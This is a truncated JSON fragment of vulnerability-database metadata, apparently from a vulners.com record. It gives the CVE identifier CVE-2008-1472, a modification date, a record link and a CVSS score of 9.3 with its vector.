"cvss2": {}, "cvelist": ["CVE-2008-1472"], "modified": "2008-03-30T00:00:00", "id": "SECURITYVULNS:DOC:19535", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19535", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
